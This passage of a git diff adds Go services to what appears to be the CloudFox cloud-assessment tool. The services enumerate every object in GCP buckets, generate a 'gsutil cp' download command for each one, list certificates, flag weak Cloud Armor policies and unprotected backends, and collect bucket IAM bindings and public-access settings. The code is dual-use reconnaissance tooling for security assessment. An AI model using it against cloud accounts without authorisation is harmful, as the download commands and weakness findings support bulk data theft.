fmt.Sprintf("CMEK (%s)", keyName) + } + return "CMEK" + } + + // Default is Google-managed encryption + return "Google-managed" +} + +// ObjectInfo represents any file in a bucket (for full enumeration) +type ObjectInfo struct { + BucketName string `json:"bucketName"` + ObjectName string `json:"objectName"` + ProjectID string `json:"projectId"` + Size int64 `json:"size"` + ContentType string `json:"contentType"` + Updated string `json:"updated"` + StorageClass string `json:"storageClass"` + IsPublic bool `json:"isPublic"` + DownloadCmd string 
`json:"downloadCmd"` + Encryption string `json:"encryption"` // Encryption type (Google-managed or CMEK key name) +} + +// EnumerateAllBucketObjects lists ALL objects in a bucket (no filtering) +func (s *BucketEnumService) EnumerateAllBucketObjects(bucketName, projectID string, maxObjects int) ([]ObjectInfo, error) { + ctx := context.Background() + + storageService, err := s.getStorageService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var objects []ObjectInfo + objectCount := 0 + + // List objects in the bucket + req := storageService.Objects.List(bucketName) + + err = req.Pages(ctx, func(objList *storage.Objects) error { + for _, obj := range objList.Items { + if maxObjects > 0 && objectCount >= maxObjects { + return iterator.Done + } + + isPublic := s.isObjectPublic(obj) + + objects = append(objects, ObjectInfo{ + BucketName: bucketName, + ObjectName: obj.Name, + ProjectID: projectID, + Size: int64(obj.Size), + ContentType: obj.ContentType, + Updated: obj.Updated, + StorageClass: obj.StorageClass, + IsPublic: isPublic, + DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), + Encryption: s.getObjectEncryption(obj), + }) + objectCount++ + } + return nil + }) + + if err != nil && err != iterator.Done { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return objects, nil +} + +// GetBucketsList lists all buckets in a project +func (s *BucketEnumService) GetBucketsList(projectID string) ([]string, error) { + ctx := context.Background() + + storageService, err := s.getStorageService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var buckets []string + err = storageService.Buckets.List(projectID).Pages(ctx, func(bucketList *storage.Buckets) error { + for _, bucket := range bucketList.Items { + buckets = append(buckets, bucket.Name) + } + return nil + }) + if err != nil { + return nil, 
gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return buckets, nil +} diff --git a/gcp/services/certManagerService/certManagerService.go b/gcp/services/certManagerService/certManagerService.go new file mode 100644 index 00000000..ba37a8c6 --- /dev/null +++ b/gcp/services/certManagerService/certManagerService.go @@ -0,0 +1,273 @@ +package certmanagerservice + +import ( + "context" + "fmt" + "strings" + "time" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + certificatemanager "google.golang.org/api/certificatemanager/v1" + compute "google.golang.org/api/compute/v1" +) + +type CertManagerService struct { + session *gcpinternal.SafeSession +} + +func New() *CertManagerService { + return &CertManagerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *CertManagerService { + return &CertManagerService{ + session: session, + } +} + +// Certificate represents an SSL/TLS certificate +type Certificate struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Type string `json:"type"` // SELF_MANAGED, GOOGLE_MANAGED + Domains []string `json:"domains"` + ExpireTime string `json:"expireTime"` + DaysUntilExpiry int `json:"daysUntilExpiry"` + State string `json:"state"` + IssuanceState string `json:"issuanceState"` + AttachedTo []string `json:"attachedTo"` // LBs or other resources + Wildcard bool `json:"wildcard"` + Expired bool `json:"expired"` + SelfManaged bool `json:"selfManaged"` +} + +// SSLCertificate represents a compute SSL certificate (classic) +type SSLCertificate struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Type string `json:"type"` // SELF_MANAGED, MANAGED + Domains []string `json:"domains"` + ExpireTime string `json:"expireTime"` + DaysUntilExpiry int `json:"daysUntilExpiry"` + CreationTime string `json:"creationTime"` + Wildcard bool `json:"wildcard"` + Expired bool 
`json:"expired"` + SelfManaged bool `json:"selfManaged"` +} + +// CertificateMap represents a Certificate Manager certificate map +type CertificateMap struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + EntryCount int `json:"entryCount"` + Certificates []string `json:"certificates"` +} + +// getCertManagerService returns a Certificate Manager service client using cached session if available +func (s *CertManagerService) getCertManagerService(ctx context.Context) (*certificatemanager.Service, error) { + if s.session != nil { + return sdk.CachedGetCertificateManagerService(ctx, s.session) + } + return certificatemanager.NewService(ctx) +} + +// getComputeService returns a Compute service client using cached session if available +func (s *CertManagerService) getComputeService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// GetCertificates retrieves Certificate Manager certificates +func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, error) { + ctx := context.Background() + service, err := s.getCertManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") + } + + var certificates []Certificate + + // List certificates in all locations (global and regional) + locations := []string{"global"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + resp, err := service.Projects.Locations.Certificates.List(parent).Context(ctx).Do() + if err != nil { + continue // May not have permissions or no certificates + } + + for _, cert := range resp.Certificates { + c := Certificate{ + Name: extractNameFromPath(cert.Name), + ProjectID: projectID, + Location: location, + Domains: cert.SanDnsnames, + } + + // Determine type and state + if cert.Managed != nil 
{ + c.Type = "GOOGLE_MANAGED" + c.State = cert.Managed.State + c.IssuanceState = cert.Managed.State + } else if cert.SelfManaged != nil { + c.Type = "SELF_MANAGED" + c.State = "ACTIVE" // Self-managed certs are active if they exist + c.SelfManaged = true + } + + // Parse expiration + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + } + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } + + certificates = append(certificates, c) + } + } + + return certificates, nil +} + +// GetSSLCertificates retrieves classic Compute Engine SSL certificates +func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertificate, error) { + ctx := context.Background() + service, err := s.getComputeService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var certificates []SSLCertificate + + // Get all SSL certificates (global and regional) using AggregatedList + // This only requires compute.sslCertificates.list permission (not compute.regions.list) + req := service.SslCertificates.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SslCertificateAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.SslCertificates == nil { + continue + } + // Extract region from scope name (format: "regions/us-central1" or "global") + region := "" + if strings.HasPrefix(scopeName, "regions/") { + region = strings.TrimPrefix(scopeName, "regions/") + } + + for _, cert := range scopedList.SslCertificates { + c := SSLCertificate{ + Name: cert.Name, + ProjectID: projectID, + Type: cert.Type, + CreationTime: cert.CreationTimestamp, + SelfManaged: cert.Type == "SELF_MANAGED", + } + + // Add region to name for 
regional certs + if region != "" { + c.Name = fmt.Sprintf("%s (%s)", cert.Name, region) + } + + // Get domains from managed certificate + if cert.Managed != nil { + c.Domains = cert.Managed.Domains + } + + // Parse expiration + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + } + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } + + certificates = append(certificates, c) + } + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + return certificates, nil +} + +// GetCertificateMaps retrieves certificate maps +func (s *CertManagerService) GetCertificateMaps(projectID string) ([]CertificateMap, error) { + ctx := context.Background() + service, err := s.getCertManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") + } + + var maps []CertificateMap + + locations := []string{"global"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + resp, err := service.Projects.Locations.CertificateMaps.List(parent).Context(ctx).Do() + if err != nil { + continue + } + + for _, certMap := range resp.CertificateMaps { + cm := CertificateMap{ + Name: extractNameFromPath(certMap.Name), + ProjectID: projectID, + Location: location, + } + + // Get entries for this map + entriesResp, err := service.Projects.Locations.CertificateMaps.CertificateMapEntries.List(certMap.Name).Context(ctx).Do() + if err == nil { + cm.EntryCount = len(entriesResp.CertificateMapEntries) + for _, entry := range entriesResp.CertificateMapEntries { + for _, certRef := range entry.Certificates { + cm.Certificates = append(cm.Certificates, 
extractNameFromPath(certRef)) + } + } + } + + maps = append(maps, cm) + } + } + + return maps, nil +} + +func extractNameFromPath(path string) string { + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} diff --git a/gcp/services/cloudArmorService/cloudArmorService.go b/gcp/services/cloudArmorService/cloudArmorService.go new file mode 100644 index 00000000..09f58bb4 --- /dev/null +++ b/gcp/services/cloudArmorService/cloudArmorService.go @@ -0,0 +1,261 @@ +package cloudarmorservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" +) + +type CloudArmorService struct{ + session *gcpinternal.SafeSession +} + +func New() *CloudArmorService { + return &CloudArmorService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *CloudArmorService { + return &CloudArmorService{ + session: session, + } +} + +// SecurityPolicy represents a Cloud Armor security policy +type SecurityPolicy struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + Type string `json:"type"` // CLOUD_ARMOR, CLOUD_ARMOR_EDGE, CLOUD_ARMOR_NETWORK + RuleCount int `json:"ruleCount"` + Rules []SecurityRule `json:"rules"` + AdaptiveProtection bool `json:"adaptiveProtection"` + DDOSProtection string `json:"ddosProtection"` + AttachedResources []string `json:"attachedResources"` + Weaknesses []string `json:"weaknesses"` +} + +// SecurityRule represents a rule within a security policy +type SecurityRule struct { + Priority int64 `json:"priority"` + Description string `json:"description"` + Action string `json:"action"` // allow, deny, redirect, rate_based_ban, throttle + Match string `json:"match"` // Simplified match expression + Preview bool `json:"preview"` + RateLimitConfig *RateLimitInfo `json:"rateLimitConfig,omitempty"` +} + +// 
RateLimitInfo contains rate limiting configuration +type RateLimitInfo struct { + ThresholdCount int64 `json:"thresholdCount"` + IntervalSec int64 `json:"intervalSec"` + ExceedAction string `json:"exceedAction"` +} + +// getService returns a Compute service client using cached session if available +func (s *CloudArmorService) getService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// GetSecurityPolicies retrieves all Cloud Armor security policies +func (s *CloudArmorService) GetSecurityPolicies(projectID string) ([]SecurityPolicy, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var policies []SecurityPolicy + + // List security policies + resp, err := service.SecurityPolicies.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, policy := range resp.Items { + sp := SecurityPolicy{ + Name: policy.Name, + ProjectID: projectID, + Description: policy.Description, + Type: policy.Type, + RuleCount: len(policy.Rules), + Rules: []SecurityRule{}, + AttachedResources: []string{}, + Weaknesses: []string{}, + } + + // Check adaptive protection + if policy.AdaptiveProtectionConfig != nil && + policy.AdaptiveProtectionConfig.Layer7DdosDefenseConfig != nil { + sp.AdaptiveProtection = policy.AdaptiveProtectionConfig.Layer7DdosDefenseConfig.Enable + } + + // Check DDoS protection + if policy.DdosProtectionConfig != nil { + sp.DDOSProtection = policy.DdosProtectionConfig.DdosProtection + } + + // Parse rules + for _, rule := range policy.Rules { + sr := SecurityRule{ + Priority: rule.Priority, + Description: rule.Description, + Action: rule.Action, + Preview: rule.Preview, + } + + // Parse match expression + if rule.Match != nil { + if rule.Match.Expr != 
nil { + sr.Match = rule.Match.Expr.Expression + } else if rule.Match.VersionedExpr != "" { + sr.Match = rule.Match.VersionedExpr + } else if rule.Match.Config != nil { + // Source IP ranges + if len(rule.Match.Config.SrcIpRanges) > 0 { + sr.Match = fmt.Sprintf("srcIpRanges: %s", strings.Join(rule.Match.Config.SrcIpRanges, ", ")) + } + } + } + + // Rate limit config + if rule.RateLimitOptions != nil { + sr.RateLimitConfig = &RateLimitInfo{ + ExceedAction: rule.RateLimitOptions.ExceedAction, + } + if rule.RateLimitOptions.RateLimitThreshold != nil { + sr.RateLimitConfig.ThresholdCount = rule.RateLimitOptions.RateLimitThreshold.Count + sr.RateLimitConfig.IntervalSec = rule.RateLimitOptions.RateLimitThreshold.IntervalSec + } + } + + sp.Rules = append(sp.Rules, sr) + } + + // Find attached resources (backend services using this policy) + sp.AttachedResources = s.findAttachedResources(ctx, service, projectID, policy.Name) + + // Analyze for weaknesses + sp.Weaknesses = s.analyzePolicy(sp) + + policies = append(policies, sp) + } + + return policies, nil +} + +// findAttachedResources finds backend services using this security policy +func (s *CloudArmorService) findAttachedResources(ctx context.Context, service *compute.Service, projectID, policyName string) []string { + var resources []string + + // Check backend services + backendServices, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err == nil { + for _, bs := range backendServices.Items { + if bs.SecurityPolicy != "" && strings.HasSuffix(bs.SecurityPolicy, "/"+policyName) { + resources = append(resources, fmt.Sprintf("backend-service:%s", bs.Name)) + } + } + } + + return resources +} + +// analyzePolicy checks for security weaknesses in the policy +func (s *CloudArmorService) analyzePolicy(policy SecurityPolicy) []string { + var weaknesses []string + + // Check if policy is attached to anything + if len(policy.AttachedResources) == 0 { + weaknesses = append(weaknesses, "Policy not attached to 
any backend service") + } + + // Check for overly permissive rules + hasDefaultAllow := false + hasDenyRules := false + previewOnlyCount := 0 + allowAllIPsCount := 0 + + for _, rule := range policy.Rules { + if rule.Priority == 2147483647 && rule.Action == "allow" { + hasDefaultAllow = true + } + if strings.HasPrefix(rule.Action, "deny") { + hasDenyRules = true + } + if rule.Preview { + previewOnlyCount++ + } + // Check for allow rules that match all IPs + if rule.Action == "allow" && (rule.Match == "*" || rule.Match == "srcIpRanges: *" || + strings.Contains(rule.Match, "0.0.0.0/0") || rule.Match == "true") { + allowAllIPsCount++ + } + } + + if hasDefaultAllow && !hasDenyRules { + weaknesses = append(weaknesses, "Default allow rule with no deny rules") + } + + if previewOnlyCount > 0 { + weaknesses = append(weaknesses, fmt.Sprintf("%d rule(s) in preview mode", previewOnlyCount)) + } + + if allowAllIPsCount > 0 && !hasDenyRules { + weaknesses = append(weaknesses, "Has allow-all rules without deny rules") + } + + // Check adaptive protection + if !policy.AdaptiveProtection { + weaknesses = append(weaknesses, "Adaptive protection not enabled") + } + + // Check for common WAF rules + hasOWASPRules := false + for _, rule := range policy.Rules { + matchLower := strings.ToLower(rule.Match) + if strings.Contains(matchLower, "sqli") || strings.Contains(matchLower, "xss") || + strings.Contains(matchLower, "rce") || strings.Contains(matchLower, "lfi") { + hasOWASPRules = true + break + } + } + + if !hasOWASPRules { + weaknesses = append(weaknesses, "No OWASP/WAF rules detected") + } + + return weaknesses +} + +// GetUnprotectedLoadBalancers finds load balancers without Cloud Armor protection +func (s *CloudArmorService) GetUnprotectedLoadBalancers(projectID string) ([]string, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var unprotected []string + + // 
Get all backend services + backendServices, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, bs := range backendServices.Items { + if bs.SecurityPolicy == "" { + unprotected = append(unprotected, bs.Name) + } + } + + return unprotected, nil +} diff --git a/gcp/services/cloudStorageService/cloudStorageService.go b/gcp/services/cloudStorageService/cloudStorageService.go index c91f071a..a6511719 100644 --- a/gcp/services/cloudStorageService/cloudStorageService.go +++ b/gcp/services/cloudStorageService/cloudStorageService.go @@ -3,38 +3,108 @@ package cloudstorageservice import ( "context" "fmt" + "strings" + "time" + "cloud.google.com/go/iam" "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/iterator" + storageapi "google.golang.org/api/storage/v1" ) type CloudStorageService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new CloudStorageService (requires session for SDK caching) func New() *CloudStorageService { return &CloudStorageService{} } -// type ObjectInfo struct { -// ObjectName string `json:"objecttName"` -// ObjectSizeBytes float64 `json:"objectSizeBytes"` -// IsPublic bool `json:"isPublic"` -// } +// NewWithSession creates a CloudStorageService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *CloudStorageService { + return &CloudStorageService{session: session} +} + +// IAMBinding represents a single IAM binding on a bucket +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} +// LifecycleRule represents a single lifecycle rule on a bucket +type LifecycleRule struct { + Action string `json:"action"` // Delete, SetStorageClass, AbortIncompleteMultipartUpload + StorageClass string `json:"storageClass"` // Target storage 
class (for SetStorageClass) + AgeDays int64 `json:"ageDays"` // Age condition in days + NumVersions int64 `json:"numVersions"` // Number of newer versions condition + IsLive *bool `json:"isLive"` // Whether object is live (vs archived) + MatchesPrefix string `json:"matchesPrefix"` // Object name prefix match + MatchesSuffix string `json:"matchesSuffix"` // Object name suffix match + MatchesStorage string `json:"matchesStorage"` // Storage class match + CreatedBefore string `json:"createdBefore"` // Created before date condition + DaysSinceCustom int64 `json:"daysSinceCustom"` // Days since custom time + DaysSinceNoncurrent int64 `json:"daysSinceNoncurrent"` // Days since became noncurrent +} + +// BucketInfo contains bucket metadata and security-relevant configuration type BucketInfo struct { + // Basic info Name string `json:"name"` Location string `json:"location"` ProjectID string `json:"projectID"` + + // Security-relevant fields + PublicAccessPrevention string `json:"publicAccessPrevention"` // "enforced", "inherited", or "unspecified" + UniformBucketLevelAccess bool `json:"uniformBucketLevelAccess"` // true = IAM only, no ACLs + VersioningEnabled bool `json:"versioningEnabled"` // Object versioning + RequesterPays bool `json:"requesterPays"` // Requester pays enabled + DefaultEventBasedHold bool `json:"defaultEventBasedHold"` // Event-based hold on new objects + LoggingEnabled bool `json:"loggingEnabled"` // Access logging enabled + LogBucket string `json:"logBucket"` // Destination bucket for logs + EncryptionType string `json:"encryptionType"` // "Google-managed", "CMEK", or "CSEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + RetentionPolicyEnabled bool `json:"retentionPolicyEnabled"` // Retention policy set + RetentionPeriodDays int64 `json:"retentionPeriodDays"` // Retention period in days + RetentionPolicyLocked bool `json:"retentionPolicyLocked"` // Retention policy is locked (immutable) + SoftDeleteEnabled bool 
`json:"softDeleteEnabled"` // Soft delete policy enabled + SoftDeleteRetentionDays int64 `json:"softDeleteRetentionDays"` // Soft delete retention in days + StorageClass string `json:"storageClass"` // Default storage class + AutoclassEnabled bool `json:"autoclassEnabled"` // Autoclass feature enabled + AutoclassTerminalClass string `json:"autoclassTerminalClass"` // Terminal storage class for autoclass + + // Lifecycle configuration + LifecycleEnabled bool `json:"lifecycleEnabled"` // Has lifecycle rules + LifecycleRuleCount int `json:"lifecycleRuleCount"` // Number of lifecycle rules + LifecycleRules []LifecycleRule `json:"lifecycleRules"` // Parsed lifecycle rules + HasDeleteRule bool `json:"hasDeleteRule"` // Has a delete action rule + HasArchiveRule bool `json:"hasArchiveRule"` // Has a storage class transition rule + ShortestDeleteDays int64 `json:"shortestDeleteDays"` // Shortest delete age in days + TurboReplication bool `json:"turboReplication"` // Turbo replication enabled (dual-region) + LocationType string `json:"locationType"` // "region", "dual-region", or "multi-region" + + // Public access indicators + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings"` // IAM policy bindings on the bucket + + // Timestamps + Created string `json:"created"` + Updated string `json:"updated"` } func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { ctx := context.Background() - client, err := storage.NewClient(ctx) + + // Get cached client from SDK + client, err := cs.getClient(ctx) if err != nil { - return nil, fmt.Errorf("Failed to create client: %v", err) + return nil, err } - defer client.Close() var buckets []BucketInfo bucketIterator := client.Buckets(ctx, projectID) @@ -46,72 +116,286 @@ func (cs *CloudStorageService) Buckets(projectID string) 
([]BucketInfo, error) { if err != nil { return nil, err } - bucket := BucketInfo{Name: battrs.Name, Location: battrs.Location, ProjectID: projectID} + + bucket := BucketInfo{ + Name: battrs.Name, + Location: battrs.Location, + ProjectID: projectID, + } + + // Security fields + bucket.PublicAccessPrevention = publicAccessPreventionToString(battrs.PublicAccessPrevention) + bucket.UniformBucketLevelAccess = battrs.UniformBucketLevelAccess.Enabled + bucket.VersioningEnabled = battrs.VersioningEnabled + bucket.RequesterPays = battrs.RequesterPays + bucket.DefaultEventBasedHold = battrs.DefaultEventBasedHold + bucket.StorageClass = battrs.StorageClass + + // Logging + if battrs.Logging != nil { + bucket.LoggingEnabled = battrs.Logging.LogBucket != "" + bucket.LogBucket = battrs.Logging.LogBucket + } + + // Encryption + if battrs.Encryption != nil && battrs.Encryption.DefaultKMSKeyName != "" { + bucket.EncryptionType = "CMEK" + bucket.KMSKeyName = battrs.Encryption.DefaultKMSKeyName + } else { + bucket.EncryptionType = "Google-managed" + } + + // Retention Policy + if battrs.RetentionPolicy != nil { + bucket.RetentionPolicyEnabled = true + bucket.RetentionPeriodDays = int64(battrs.RetentionPolicy.RetentionPeriod.Hours() / 24) + bucket.RetentionPolicyLocked = battrs.RetentionPolicy.IsLocked + } + + // Autoclass + if battrs.Autoclass != nil && battrs.Autoclass.Enabled { + bucket.AutoclassEnabled = true + bucket.AutoclassTerminalClass = battrs.Autoclass.TerminalStorageClass + } + + // Timestamps + if !battrs.Created.IsZero() { + bucket.Created = battrs.Created.Format("2006-01-02") + } + + // Get additional fields via REST API (SoftDeletePolicy, Updated) + cs.enrichBucketFromRestAPI(ctx, &bucket) + + // Get IAM policy for the bucket + iamBindings, isPublic, publicAccess := cs.getBucketIAMPolicy(ctx, client, battrs.Name) + bucket.IAMBindings = iamBindings + bucket.IsPublic = isPublic + bucket.PublicAccess = publicAccess + buckets = append(buckets, bucket) } return buckets, nil 
} -// func (cs *CloudStorageService) BucketsWithMetaData(projectID string) (map[string][]BucketInfo, error) { -// buckets, _ := cs.Buckets(projectID) -// bucketInfos := make(map[string][]BucketInfo) -// ctx := context.Background() -// client, err := storage.NewClient(ctx) -// if err != nil { -// return nil, fmt.Errorf("Failed to create client: %v", err) -// } -// for { -// bucketAttrs, err := buckets.Next() -// if err == iterator.Done { -// break -// } -// if err != nil { -// return nil, fmt.Errorf("failed to list buckets: %v", err) -// } - -// bucketName := bucketAttrs.Name -// log.Printf("Working on bucket %s", bucketName) - -// // List all objects in the bucket and calculate total size -// totalSize := int64(0) -// var objects []ObjectInfo -// it := client.Bucket(bucketName).Objects(ctx, nil) -// for { -// objectAttrs, err := it.Next() -// if err == iterator.Done { -// break -// } -// if err != nil { -// return nil, fmt.Errorf("failed to list objects in bucket %s: %v", bucketName, err) -// } - -// // Get size -// objectSize := objectAttrs.Size -// totalSize += objectSize - -// // Check if public -// isPublic := false -// for _, rule := range objectAttrs.ACL { -// if rule.Entity == storage.AllUsers { -// isPublic = true -// break -// } -// } - -// objects = append(objects, ObjectInfo{ObjectName: objectAttrs.Name, ObjectSizeBytes: float64(objectSize), IsPublic: isPublic}) - -// if totalSize > 3221225472 { // 3 GiB in bytes -// log.Printf("%s bucket is over 3 GiB. 
Skipping remaining objects in this bucket...", bucketName) -// break -// } -// } -// bucketSizeMB := float64(totalSize) / 1024 / 1024 -// bucketInfos[projectID] = append(bucketInfos[projectID], BucketInfo{BucketName: bucketName, BucketSizeMB: bucketSizeMB, Objects: objects}) -// } -// log.Printf("Sorting resulting list of buckets in descending order %s", projectID) -// sort.Slice(bucketInfos[projectID], func(i, j int) bool { -// return bucketInfos[projectID][i].BucketSizeMB > bucketInfos[projectID][j].BucketSizeMB -// }) - -// return bucketInfos, nil -// } +// getClient returns a cached storage client from SDK +func (cs *CloudStorageService) getClient(ctx context.Context) (*storage.Client, error) { + if cs.session != nil { + return sdk.CachedGetStorageClient(ctx, cs.session) + } + // Fallback to direct creation for legacy usage (no caching) + return storage.NewClient(ctx) +} + +// getStorageService returns a cached storage REST API service from SDK +func (cs *CloudStorageService) getStorageService(ctx context.Context) (*storageapi.Service, error) { + if cs.session != nil { + return sdk.CachedGetStorageService(ctx, cs.session) + } + // Fallback to direct creation for legacy usage (no caching) + return storageapi.NewService(ctx) +} + +// getBucketIAMPolicy retrieves the IAM policy for a bucket and checks for public access +func (cs *CloudStorageService) getBucketIAMPolicy(ctx context.Context, client *storage.Client, bucketName string) ([]IAMBinding, bool, string) { + var bindings []IAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + policy, err := client.Bucket(bucketName).IAM().Policy(ctx) + if err != nil { + // Return empty bindings if we can't get the policy (permission denied, etc.) 
+ return bindings, false, "Unknown" + } + + // Convert IAM policy to our binding format + for _, role := range policy.Roles() { + members := policy.Members(role) + if len(members) > 0 { + binding := IAMBinding{ + Role: string(role), + Members: make([]string, len(members)), + } + for i, member := range members { + binding.Members[i] = member + + // Check for public access + if member == string(iam.AllUsers) { + hasAllUsers = true + isPublic = true + } + if member == string(iam.AllAuthenticatedUsers) { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + bindings = append(bindings, binding) + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + +// GetBucketIAMPolicyOnly retrieves just the IAM policy for a specific bucket +func (cs *CloudStorageService) GetBucketIAMPolicyOnly(bucketName string) ([]IAMBinding, error) { + ctx := context.Background() + + client, err := cs.getClient(ctx) + if err != nil { + return nil, err + } + + bindings, _, _ := cs.getBucketIAMPolicy(ctx, client, bucketName) + return bindings, nil +} + +// publicAccessPreventionToString converts the PublicAccessPrevention type to a readable string +func publicAccessPreventionToString(pap storage.PublicAccessPrevention) string { + switch pap { + case storage.PublicAccessPreventionEnforced: + return "enforced" + case storage.PublicAccessPreventionInherited: + return "inherited" + default: + return "unspecified" + } +} + +// FormatIAMBindings formats IAM bindings for display +func FormatIAMBindings(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "No IAM bindings" + } + + var parts []string + for _, binding := range bindings { + memberStr := strings.Join(binding.Members, ", ") + 
parts = append(parts, fmt.Sprintf("%s: [%s]", binding.Role, memberStr)) + } + return strings.Join(parts, "; ") +} + +// FormatIAMBindingsShort formats IAM bindings in a shorter format for table display +func FormatIAMBindingsShort(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "-" + } + return fmt.Sprintf("%d binding(s)", len(bindings)) +} + +// enrichBucketFromRestAPI fetches additional bucket fields via the REST API +// that may not be available in the Go SDK version +func (cs *CloudStorageService) enrichBucketFromRestAPI(ctx context.Context, bucket *BucketInfo) { + service, err := cs.getStorageService(ctx) + if err != nil { + // Silently fail - these are optional enrichments + return + } + + // Get bucket details via REST API + restBucket, err := service.Buckets.Get(bucket.Name).Context(ctx).Do() + if err != nil { + // Silently fail - these are optional enrichments + return + } + + // Parse SoftDeletePolicy + if restBucket.SoftDeletePolicy != nil { + if restBucket.SoftDeletePolicy.RetentionDurationSeconds > 0 { + bucket.SoftDeleteEnabled = true + bucket.SoftDeleteRetentionDays = restBucket.SoftDeletePolicy.RetentionDurationSeconds / 86400 // seconds to days + } + } + + // Parse Updated timestamp + if restBucket.Updated != "" { + // REST API returns RFC3339 format + if t, err := time.Parse(time.RFC3339, restBucket.Updated); err == nil { + bucket.Updated = t.Format("2006-01-02") + } + } + + // Parse location type + bucket.LocationType = restBucket.LocationType + + // Parse Turbo Replication (for dual-region buckets) + if restBucket.Rpo == "ASYNC_TURBO" { + bucket.TurboReplication = true + } + + // Parse Lifecycle rules + if restBucket.Lifecycle != nil && len(restBucket.Lifecycle.Rule) > 0 { + bucket.LifecycleEnabled = true + bucket.LifecycleRuleCount = len(restBucket.Lifecycle.Rule) + bucket.ShortestDeleteDays = -1 // Initialize to -1 to indicate not set + + for _, rule := range restBucket.Lifecycle.Rule { + lcRule := LifecycleRule{} + + // 
